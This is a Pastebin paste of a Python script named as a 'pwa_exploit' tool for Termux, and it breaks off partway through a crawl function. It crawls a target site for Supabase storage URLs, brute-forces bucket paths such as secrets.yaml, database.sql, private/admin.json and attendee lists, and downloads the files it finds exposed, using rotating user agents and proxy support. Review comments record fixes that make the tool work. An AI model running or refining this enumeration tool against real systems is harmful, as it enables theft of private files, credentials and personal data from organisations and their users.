Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import json
- import requests
- import os
- import time
- import hashlib
- import re
- import asyncio
- import aiohttp
- from urllib.parse import urlparse, urljoin
- import argparse
- from datetime import datetime
- import mimetypes
- import itertools
- from pathlib import Path
- import concurrent.futures
- import subprocess
- import random
- import zipfile
- try:
- from tqdm import tqdm
- except ImportError:
- tqdm = lambda x, **kwargs: x
- try:
- import PyPDF2
- except ImportError:
- PyPDF2 = None
- try:
- from PIL import Image
- except ImportError:
- Image = None
# --- Output & logging locations (Termux shared storage) ---
OUTPUT_DIR = os.path.expanduser("~/storage/shared/pwa_exploit_downloads")   # downloaded files land here
REPORT_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_report.json")  # JSON report output
CSV_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_report.csv")      # CSV report output
HTML_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_report.html")    # HTML report output
LOG_FILE = os.path.expanduser("~/storage/shared/pwa_exploit.log")             # run log (written by log_message)
ERROR_LOG = os.path.expanduser("~/storage/shared/pwa_exploit_errors.log")     # error log (written by log_error)
CONFIG_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_config.json")  # persisted config (see load_config)
# --- Network / enumeration tuning ---
TIMEOUT = 15            # per-request timeout, seconds
MAX_ATTEMPTS = 500      # cap on discovered files per run
RATE_LIMIT_DELAY = 0.5  # base inter-request delay, seconds (jittered and backed off elsewhere)
MAX_RETRIES = 3         # retry count for HTTP operations
MAX_WORKERS = 2         # NOTE(review): not referenced anywhere in the visible code -- confirm before removing
# Only responses matching BOTH a MIME type below and an allowed extension are downloaded.
ALLOWED_FILE_TYPES = ['image/jpeg', 'image/png', 'image/webp', 'application/pdf', 'application/json', 'application/zip', 'text/plain', 'text/csv']
ALLOWED_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.webp', '.pdf', '.json', '.zip', '.txt', '.csv']
MAX_FILE_SIZE = 5 * 1024 * 1024  # 5 MiB per-file cap
# A User-Agent is picked at random from this pool for every session.
USER_AGENTS = [
    'Mozilla/5.0 (Linux; Android 10; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36',
    'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
]
async def async_get(url, proxy=None, timeout=TIMEOUT):
    """Fetch *url* and return ``(body_text, content_type, status)``.

    Returns ``(None, None, None)`` on any network/HTTP failure so callers can
    unpack the three-tuple unconditionally.

    Bug fixed: the original assigned ``session.connector`` *after* the session
    was constructed -- ``connector`` is a read-only property, so the http-proxy
    branch raised AttributeError which the bare except silently turned into a
    failed fetch.  The connector is now supplied at construction and the
    response is closed via ``async with`` instead of being leaked.
    """
    try:
        # For plain-http proxies, skip TLS verification on the connector.
        connector = aiohttp.TCPConnector(ssl=False) if proxy and proxy.startswith('http://') else None
        async with aiohttp.ClientSession(
            headers={'User-Agent': random.choice(USER_AGENTS)},
            connector=connector,
        ) as session:
            async with session.get(url, proxy=proxy, timeout=timeout) as response:
                response.raise_for_status()
                body = await response.text()
                return body, response.headers.get('content-type', 'unknown'), response.status
    except (aiohttp.ClientError, asyncio.TimeoutError, ValueError):
        # Narrowed from a bare except: connection errors, timeouts and bad
        # URLs are the expected failure modes; anything else should surface.
        return None, None, None
# Matches the ANSI colour escape sequences used throughout this script.
_ANSI_ESCAPE_RE = re.compile(r'\x1b\[[0-9;]*m')

def log_message(message, verbose=False, quiet=False):
    """Print *message* (unless *quiet*) and append a UTC-stamped,
    colour-stripped copy to LOG_FILE.

    Bug fixed: the original embedded backslash escapes (``'\\033[0m'``) inside
    an f-string expression, which is a SyntaxError on every Python before
    3.12.  A compiled regex now strips *all* ANSI colour codes, not only the
    five that were hard-coded.

    NOTE(review): *verbose* is accepted (callers pass it) but unused -- same
    as the original; confirm intended behaviour before wiring it up.
    """
    if not quiet:
        print(message)
    plain = _ANSI_ESCAPE_RE.sub('', message)
    timestamp = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')
    with open(LOG_FILE, 'a') as f:
        f.write(f"{timestamp} - {plain}\n")
def log_error(message):
    """Append *message* to ERROR_LOG, prefixed with a UTC timestamp."""
    stamp = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')
    with open(ERROR_LOG, 'a') as handle:
        handle.write(f"{stamp} - {message}\n")
def check_termux_storage():
    """Request Termux shared-storage access and return a writable directory.

    Prefers ``~/storage/shared``; falls back to the home directory, and even
    on probe failure still returns the home directory so callers always get
    a path to work with.

    Bug fixed: the original passed a list *and* ``shell=True`` to
    subprocess.run -- with a list, only the first element is handed to the
    shell.  The binary is now executed directly (shell=False), which is also
    the safer form.
    """
    try:
        subprocess.run(["termux-setup-storage"], check=False)
        time.sleep(2)  # give Termux a moment to mount shared storage
        shared_dir = os.path.expanduser("~/storage/shared")
        if os.path.exists(shared_dir) and os.access(shared_dir, os.W_OK):
            return shared_dir
        home_dir = os.path.expanduser("~/")
        if os.access(home_dir, os.W_OK):
            return home_dir
        raise Exception("No writable directory found")
    except Exception as e:
        log_error(f"Storage check failed: {e}")
        return os.path.expanduser("~/")
def notify_termux(message):
    """Show *message* as a Termux toast notification, best-effort.

    Every failure (missing termux-toast binary, permission issues, even
    interrupts, matching the original bare except) is silently ignored.
    """
    try:
        subprocess.run(["termux-toast", message], check=False)
    except BaseException:
        pass
def get_free_space(path):
    """Return the free bytes available on the filesystem holding *path*.

    A path that cannot be stat'ed reports infinite space, so storage checks
    never block on a probe error (matches the original bare-except fallback).
    """
    try:
        vfs = os.statvfs(path)
    except BaseException:
        return float('inf')
    return vfs.f_bavail * vfs.f_frsize
# One-pass translation table for characters that are invalid in filenames.
_FILENAME_TRANSLATION = str.maketrans({c: '_' for c in '<>:"/\\|?*'})

def sanitize_filename(filename):
    """Replace filesystem-hostile characters with '_' and cap at 255 chars."""
    return filename.translate(_FILENAME_TRANSLATION)[:255]
def clean_storage(output_dir, quiet=False, ultra_low_memory=False):
    """Delete every file in *output_dir* when free space drops below twice
    MAX_FILE_SIZE.

    No-op in ultra-low-memory mode.  Individual files that cannot be removed
    are skipped silently; a failure of the sweep itself is logged.
    """
    if ultra_low_memory:
        return
    if get_free_space(output_dir) >= MAX_FILE_SIZE * 2:
        return
    log_message("\033[33m[*] Low storage detected, cleaning up ⏳\033[0m", quiet=quiet)
    try:
        for entry in os.listdir(output_dir):
            try:
                os.remove(os.path.join(output_dir, entry))
            except BaseException:
                pass  # best effort: leave undeletable entries behind
        log_message("\033[32m[+] Storage cleaned successfully ✅\033[0m", quiet=quiet)
        notify_termux("Storage cleaned")
    except Exception as e:
        log_error(f"Storage cleanup failed: {e}")
        log_message("\033[31m[-] Failed to clean storage ❌\033[0m", quiet=quiet)
def load_config():
    """Load the JSON config from CONFIG_FILE, creating it with defaults on
    first run.

    Improvement: values loaded from an existing file are now merged *over*
    the defaults, so a hand-edited config that omits a key (e.g. 'wordlist'
    or 'max_attempts') no longer crashes later ``config[...]`` lookups.
    An unreadable or corrupt file falls back to the defaults.
    """
    default_config = {
        'timeout': TIMEOUT,
        'max_attempts': MAX_ATTEMPTS,
        'max_file_size': MAX_FILE_SIZE,
        'allowed_extensions': ALLOWED_EXTENSIONS,
        'wordlist': ['public', 'assets', 'speakers', 'backups', 'data', 'cfp', 'tickets', 'sponsors', 'workshops', 'archive']
    }
    try:
        if os.path.exists(CONFIG_FILE):
            with open(CONFIG_FILE, 'r') as f:
                # Merge: user values win, missing keys fall back to defaults.
                return {**default_config, **json.load(f)}
        with open(CONFIG_FILE, 'w') as f:
            json.dump(default_config, f, indent=2)
        return default_config
    except Exception:
        return default_config
async def discover_manifest(domain, proxy=None, verbose=False, quiet=False):
    """Locate the PWA web-app manifest for *domain*.

    Scans the landing page for a ``<link rel="manifest">`` tag first, then
    probes the conventional well-known manifest paths.  Returns the absolute
    manifest URL, or None when nothing is found or an error occurs.
    """
    try:
        page, _, _ = await async_get(domain, proxy)
        if not page:
            log_message("\033[31m[-] Failed to fetch domain for manifest discovery ❌\033[0m", verbose, quiet)
            return None
        tag = re.search(r'<link[^>]+rel=["\']manifest["\'][^>]+href=["\'](.*?)["\']', page)
        if tag:
            resolved = urljoin(domain, tag.group(1))
            log_message(f"\033[32m[+] Discovered manifest: {resolved} ✅\033[0m", verbose, quiet)
            return resolved
        for candidate in ('/manifest.json', '/app.webmanifest', '/site.webmanifest'):
            url = urljoin(domain, candidate)
            _, content_type, status = await async_get(url, proxy)
            if status == 200 and content_type.startswith('application'):
                log_message(f"\033[32m[+] Discovered manifest: {url} ✅\033[0m", verbose, quiet)
                return url
        log_message("\033[31m[-] No manifest found on domain ❌\033[0m", verbose, quiet)
        return None
    except Exception as e:
        log_error(f"Manifest discovery failed: {e}")
        log_message(f"\033[31m[-] Error discovering manifest: {e} ❌\033[0m", verbose, quiet)
        return None
async def parse_manifest(manifest_path_or_url, proxy=None, verbose=False, quiet=False):
    """Parse a web-app manifest given either a URL or a local file path.

    Returns ``(icon_src_list, start_url)``; ``([], '')`` on any failure.
    """
    try:
        if manifest_path_or_url.startswith('http'):
            body, content_type, status = await async_get(manifest_path_or_url, proxy)
            if status != 200 or not content_type.startswith('application'):
                raise Exception("Invalid manifest response")
            manifest_data = json.loads(body)
        else:
            with open(manifest_path_or_url, 'r') as handle:
                manifest_data = json.load(handle)
        icons = [entry['src'] for entry in manifest_data.get('icons', []) if 'src' in entry]
        log_message(f"\033[32m[+] Found {len(icons)} icon(s) ✅\033[0m", verbose, quiet)
        return icons, manifest_data.get('start_url', '')
    except Exception as e:
        log_error(f"Manifest parsing failed: {e}")
        log_message(f"\033[31m[-] Error parsing manifest: {e} ❌\033[0m", verbose, quiet)
        return [], ''
async def crawl_parent_domain(domain, proxy=None, verbose=False, quiet=False):
    """Breadth-first crawl (max depth 2) of *domain*, collecting Supabase
    public-storage URLs found in page bodies, robots.txt and sitemap.xml.

    Returns a set of matching URLs; an unrecoverable error returns an empty
    set.

    Bugs fixed: (1) the original looked up completed futures with
    ``tasks.index(future)``, but ``asyncio.as_completed`` yields *wrapper*
    coroutines that are never members of the task list, so every lookup
    raised ValueError and the whole crawl aborted -- results are now gathered
    in order and zipped with their URLs; (2) ``line.split(': ')[1]`` raised
    IndexError for robots.txt directives without a space after the colon --
    ``partition`` is used instead.
    """
    try:
        urls = set([domain])
        supabase_urls = set()
        visited = set()
        depth = 0
        while urls and depth < 2:
            current_urls = [u for u in urls if u not in visited]
            urls.clear()
            depth += 1
            log_message(f"\033[33m[*] Crawling {domain} at depth {depth}/2... ⏳\033[0m", verbose, quiet)
            results = await asyncio.gather(*(async_get(u, proxy) for u in current_urls))
            for url, (text, content_type, _) in zip(current_urls, results):
                if not text:
                    continue
                visited.add(url)
                if content_type.startswith('text/html'):
                    links = re.findall(r'href=["\'](.*?)["\']', text) + re.findall(r'src=["\'](.*?)["\']', text)
                    for link in links:
                        # Only follow absolute or root-relative links that stay on this domain.
                        if link.startswith('http') or link.startswith('/'):
                            new_url = urljoin(domain, link)
                            if domain in new_url and new_url not in visited:
                                urls.add(new_url)
                matches = re.findall(r'https?://[a-z0-9]+\.supabase\.co/storage/v1/object/public/[^"\s>]+', text)
                supabase_urls.update(matches)
                log_message(f"\033[32m[+] Found {len(matches)} Supabase URLs in {url} ✅\033[0m", verbose, quiet)
        for path in ['/robots.txt', '/sitemap.xml']:
            url = urljoin(domain, path)
            if url in visited:
                continue
            text, _, _ = await async_get(url, proxy)
            if text:
                visited.add(url)
                if path == '/robots.txt':
                    urls.update(
                        urljoin(domain, line.partition(':')[2].strip())
                        for line in text.splitlines()
                        if line.startswith(('Allow:', 'Sitemap:'))
                    )
                elif path == '/sitemap.xml':
                    urls.update(re.findall(r'<loc>(.*?)</loc>', text))
                log_message(f"\033[32m[+] Found {len(urls)} URLs from {url} ✅\033[0m", verbose, quiet)
        return supabase_urls
    except Exception as e:
        log_error(f"Parent domain crawling failed: {e}")
        log_message(f"\033[31m[-] Error crawling parent domain: {e} ❌\033[0m", verbose, quiet)
        return set()
async def is_publicly_accessible(url, proxy=None):
    """HEAD-check *url*; return ``(True, content_type)`` only for a 200
    response whose size and extension pass the allow-lists, else
    ``(False, None)``.

    Retries up to MAX_RETRIES times with exponential backoff and jitter.

    Bug fixed: the proxy branch assigned ``session.connector`` after the
    session was built -- ``connector`` is a read-only property, so the
    assignment raised and the retry loop burned all attempts.  The connector
    is now supplied at construction, and the response is closed via
    ``async with`` instead of being leaked.
    """
    for attempt in range(MAX_RETRIES):
        try:
            connector = aiohttp.TCPConnector(ssl=False) if proxy and proxy.startswith('http://') else None
            async with aiohttp.ClientSession(
                headers={'User-Agent': random.choice(USER_AGENTS)},
                connector=connector,
            ) as session:
                async with session.head(url, allow_redirects=True, proxy=proxy, timeout=TIMEOUT) as response:
                    if response.status == 200:
                        content_type = response.headers.get('content-type', 'unknown')
                        content_length = int(response.headers.get('content-length', 0))
                        # Reject oversized files and disallowed extensions up front.
                        if content_length > MAX_FILE_SIZE or not any(url.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS):
                            return False, None
                        return True, content_type
                    return False, None
        except Exception as e:
            log_error(f"Accessibility check failed for {url}: {e}")
            await asyncio.sleep(RATE_LIMIT_DELAY * (2 ** attempt) * random.uniform(0.8, 1.2))
    return False, None
def extract_bucket_info(supabase_url):
    """Split a Supabase storage URL into ``(project_ref, bucket, prefix)``.

    Expected layout::

        https://<ref>.supabase.co/storage/v1/object/public/<bucket>/<prefix...>

    Returns ``(None, None, None)`` for URLs that do not match.

    Bug fixed: the original took path segment 3 as the bucket, so for the
    canonical public URL it always returned bucket='public' and folded the
    real bucket name into the prefix -- downstream URL building then produced
    doubled '/public/public/' paths.  The access-mode segment is now skipped.
    """
    parsed = urlparse(supabase_url)
    parts = parsed.path.strip('/').split('/')
    if len(parts) < 4 or parts[:3] != ['storage', 'v1', 'object']:
        return None, None, None
    # Skip the access-mode segment when present (public/sign/authenticated).
    idx = 4 if parts[3] in ('public', 'sign', 'authenticated') and len(parts) > 4 else 3
    project_ref = parsed.netloc.split('.')[0]
    bucket = parts[idx]
    prefix = '/'.join(parts[idx + 1:])
    return project_ref, bucket, prefix
def generate_common_paths(config):
    """Build the list of candidate object paths probed during enumeration.

    Combines static well-known filenames, numbered image names for every
    configured extension, conference-themed assets, and directory prefixes
    drawn from the configured wordlist.

    Bug fixed: entries in ``config['allowed_extensions']`` carry a leading
    dot ('.jpg'), so the original ``f"img_{i}.{ext}"`` produced doubled dots
    ('img_1..jpg') that could never match a real object; the separator dot is
    now added only when the extension lacks one.
    """
    base_paths = [
        'index.html', 'manifest.json', 'sw.js', 'robots.txt',
        'logo.png', 'icon.svg', 'banner.jpg', 'favicon.ico',
        'config.json', 'secrets.yaml', 'backup.zip', 'database.sql',
        'public/avatars/avatar.jpg', 'private/admin.json',
        'assets/schedule.pdf', 'speakers/bios.txt', 'tickets.csv'
    ]
    dynamic_paths = [
        f"img_{i}{ext if ext.startswith('.') else '.' + ext}"
        for i in range(1, 25)
        for ext in config['allowed_extensions']
    ]
    conference_paths = [f"assets/conference_{year}.pdf" for year in range(2020, 2030)] + [
        f"speakers/speaker_{i}.jpg" for i in range(1, 30)
    ] + ['cfp_submissions.zip', 'attendees.xlsx', 'schedule.json', 'event_logo.png', 'sponsors.pdf', 'workshops.pdf', 'keynote.pptx', 'badges.pdf']
    dir_brute = [f"{prefix}/" for prefix in config['wordlist'] + ['events', '2025', 'uploads', 'private']]
    return base_paths + dynamic_paths + conference_paths + dir_brute
def calculate_file_hash(file_path):
    """Return the hex SHA-256 digest of *file_path*, or 'unknown' if the
    file cannot be read.

    Bug fixed: the bare ``except:`` also swallowed KeyboardInterrupt and
    SystemExit; only OS-level read errors are now mapped to 'unknown'.
    """
    sha256 = hashlib.sha256()
    try:
        with open(file_path, 'rb') as f:
            # Stream in 4 KiB chunks so large files never sit fully in memory.
            for chunk in iter(lambda: f.read(4096), b''):
                sha256.update(chunk)
    except OSError:
        return 'unknown'
    return sha256.hexdigest()
def extract_file_content(file_path, content_type, low_memory, ultra_low_memory):
    """Return a short textual preview of a downloaded file.

    PDFs require PyPDF2 and images require Pillow; each optional branch is
    skipped when its library failed to import (module-level fallbacks set
    them to None).  Either low-memory flag skips extraction entirely, and
    any extraction error is logged and reported as a fixed string.
    """
    if low_memory or ultra_low_memory:
        return 'Skipped due to low-memory mode'
    try:
        if content_type == 'application/pdf' and PyPDF2:
            with open(file_path, 'rb') as handle:
                reader = PyPDF2.PdfReader(handle)
                # Only the first two pages are sampled for the preview.
                preview = ''.join(page.extract_text() or '' for page in reader.pages[:2])
                return preview[:500] or 'No text extracted'
        if content_type in ('image/jpeg', 'image/png', 'image/webp') and Image:
            with Image.open(file_path) as img:
                return f"Image metadata: {img.format}, {img.size}, {img.mode}"
        if content_type in ('text/plain', 'text/csv', 'application/json'):
            with open(file_path, 'r', errors='ignore') as handle:
                return handle.read(500)
        return 'No content extracted'
    except Exception as e:
        log_error(f"Content extraction failed for {file_path}: {e}")
        return 'Error extracting content'
async def download_file(url, output_dir=OUTPUT_DIR, proxy=None, verbose=False, quiet=False, low_memory=False, ultra_low_memory=False, test=False):
    """Download *url* into *output_dir* and return a result dict
    (url/file/size/type/hash/content_preview), or None on failure.

    In test or ultra-low-memory mode no network or disk work happens: a
    simulated result dict is returned immediately.  Otherwise the function
    checks free space (triggering a cleanup pass if short), enforces the
    MIME/extension allow-lists and MAX_FILE_SIZE while streaming, and retries
    up to MAX_RETRIES times with exponential backoff plus jitter.

    NOTE(review): the proxy branch assigns ``session.connector`` *after* the
    session is constructed -- same pattern as async_get; this likely raises
    and gets converted into a retry.  Confirm and fix alongside that helper.
    NOTE(review): a partially written file is left on disk when the size cap
    aborts mid-stream -- presumably acceptable here, but verify.
    """
    if test or ultra_low_memory:
        log_message(f"\033[32m[+] Simulated download: {url} ✅\033[0m", verbose, quiet)
        return {'url': url, 'file': 'simulated', 'size': 0, 'type': 'unknown', 'hash': 'unknown', 'content_preview': 'simulated'}
    try:
        # Ensure there is room for at least one max-size file before starting.
        if get_free_space(output_dir) < MAX_FILE_SIZE:
            clean_storage(output_dir, quiet, ultra_low_memory)
            log_message(f"\033[31m[-] Insufficient storage in {output_dir} ❌\033[0m", verbose, quiet)
            return None
        os.makedirs(output_dir, exist_ok=True, mode=0o755)
        # Local filename is the sanitized last path segment of the URL.
        filename = os.path.join(output_dir, sanitize_filename(os.path.basename(urlparse(url).path)))
        for attempt in range(MAX_RETRIES):
            try:
                async with aiohttp.ClientSession(headers={'User-Agent': random.choice(USER_AGENTS)}) as session:
                    if proxy:
                        session.connector = aiohttp.TCPConnector(ssl=False) if proxy.startswith('http://') else None
                        response = await session.get(url, proxy=proxy, timeout=TIMEOUT)
                    else:
                        response = await session.get(url, timeout=TIMEOUT)
                    response.raise_for_status()
                    content_type = response.headers.get('content-type', 'unknown')
                    # Both the reported MIME type and the URL extension must pass.
                    if content_type not in ALLOWED_FILE_TYPES or not any(url.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS):
                        log_message(f"\033[31m[-] Invalid file type: {url} ({content_type}) ❌\033[0m", verbose, quiet)
                        return None
                    total_size = 0
                    with open(filename, 'wb') as f:
                        # Stream in 8 KiB chunks, aborting once the cap would be exceeded.
                        async for chunk in response.content.iter_chunked(8192):
                            if total_size + len(chunk) > MAX_FILE_SIZE:
                                log_message(f"\033[31m[-] File too large: {url} ❌\033[0m", verbose, quiet)
                                return None
                            f.write(chunk)
                            total_size += len(chunk)
                    file_hash = calculate_file_hash(filename)
                    content_preview = extract_file_content(filename, content_type, low_memory, ultra_low_memory)
                    # NOTE(review): the literal '(unknown)' below looks like a scrubbed
                    # filename placeholder from the paste -- confirm against the original.
                    log_message(f"\033[32m[+] Downloaded: (unknown) (Size: {total_size} bytes, Type: {content_type}, SHA-256: {file_hash[:16]}...) ✅\033[0m", verbose, quiet)
                    log_message(f"\033[36m    Content preview: {content_preview[:100]}...\033[0m", verbose, quiet)
                    return {'url': url, 'file': filename, 'size': total_size, 'type': content_type, 'hash': file_hash, 'content_preview': content_preview}
            except Exception as e:
                log_error(f"Download attempt {attempt + 1} failed for {url}: {e}")
                log_message(f"\033[31m[-] Download attempt {attempt + 1} failed for {url}: {e} ❌\033[0m", verbose, quiet)
                # Exponential backoff with +/-20% jitter between attempts.
                await asyncio.sleep(RATE_LIMIT_DELAY * (2 ** attempt) * random.uniform(0.8, 1.2))
        log_message(f"\033[31m[-] Failed to download {url} after {MAX_RETRIES} attempts ❌\033[0m", verbose, quiet)
        return None
    except Exception as e:
        log_error(f"Download failed for {url}: {e}")
        log_message(f"\033[31m[-] Error downloading {url}: {e} ❌\033[0m", verbose, quiet)
        return None
async def parallel_enumerate(urls, project_ref, bucket, proxy, verbose, quiet, no_progress, low_memory, ultra_low_memory, test):
    """Probe each URL in *urls* and return the publicly accessible ones as
    ``(url, bucket_relative_path, content_type)`` tuples, stopping once the
    configured max_attempts cap is reached.

    Bugs fixed: (1) ``asyncio.as_completed`` yields wrapper coroutines, so the
    original ``tasks.index(future)`` always raised ValueError; (2) the tqdm
    branch then tried to recover the URL with ``itertools.islice`` on a
    progress iterator that had already been exhausted while building the task
    list.  URLs are now processed one at a time -- which also preserves the
    intended per-request rate limiting -- with tqdm reporting progress
    directly, and load_config() is hoisted out of the loop.
    """
    found_files = []
    max_attempts = load_config()['max_attempts']
    progress = urls if no_progress else tqdm(urls, desc="Enumerating paths")
    for url in progress:
        accessible, content_type = await is_publicly_accessible(url, proxy)
        # Jittered delay between probes to stay under rate limits.
        await asyncio.sleep(RATE_LIMIT_DELAY * random.uniform(0.8, 1.2))
        if accessible and content_type in ALLOWED_FILE_TYPES:
            path = url.replace(f"https://{project_ref}.supabase.co/storage/v1/object/public/{bucket}/", "")
            found_files.append((url, path, content_type))
            log_message(f"\033[32m[+] Exposed file: {url} (Type: {content_type}) ✅\033[0m", verbose, quiet)
        else:
            log_message(f"\033[31m[-] Not accessible or invalid type: {url} ❌\033[0m", verbose, quiet)
        if len(found_files) >= max_attempts:
            break
    return found_files
- async def recursive_crawl(base_url, project_ref, bucket, prefix, proxy, verbose, quiet, no_progress, low_memory, ultra_low_memory, test):
- found_files = []
- directories = set([prefix]) if prefix else set([''])
- visited = set()
- depth = 0
- config = load_config()
- while directories and depth < 3:
- current_dirs = list(directories)
- directories.clear()
- depth += 1
- log_message(f"\033[33m[*] Crawling depth {depth}/3 with {len(current_dirs)} directories... ⏳\033[0m", verbose, quiet)
- for dir_path in current_dirs:
- paths = generate_common_paths(config)
- urls = [urljoin(f"https://{project_ref}.supabase.co/storage/v1/object/public/{bucket}/", f"{dir_path}/{path}" if dir_path else path) for path in paths]
- found_files.extend(await parallel_enumerate(urls, project_ref, bucket, proxy, verbose, quiet, no_progress, low_memory, ultra_low_memory, test))
- for url, path, content_type in found_files:
- if not any(path.endswith(ext) for ext in config['allowed_extensions']):
- directories.add(path)
- visited.add(path)
- if len(found_files) >= config['max_attempts']:
- log_message(f"\033[31m[!] Reached max attempts, stopping enumeration ❌\033[0m", verbose, quiet)
Advertisement
Add Comment
Please, Sign In to add comment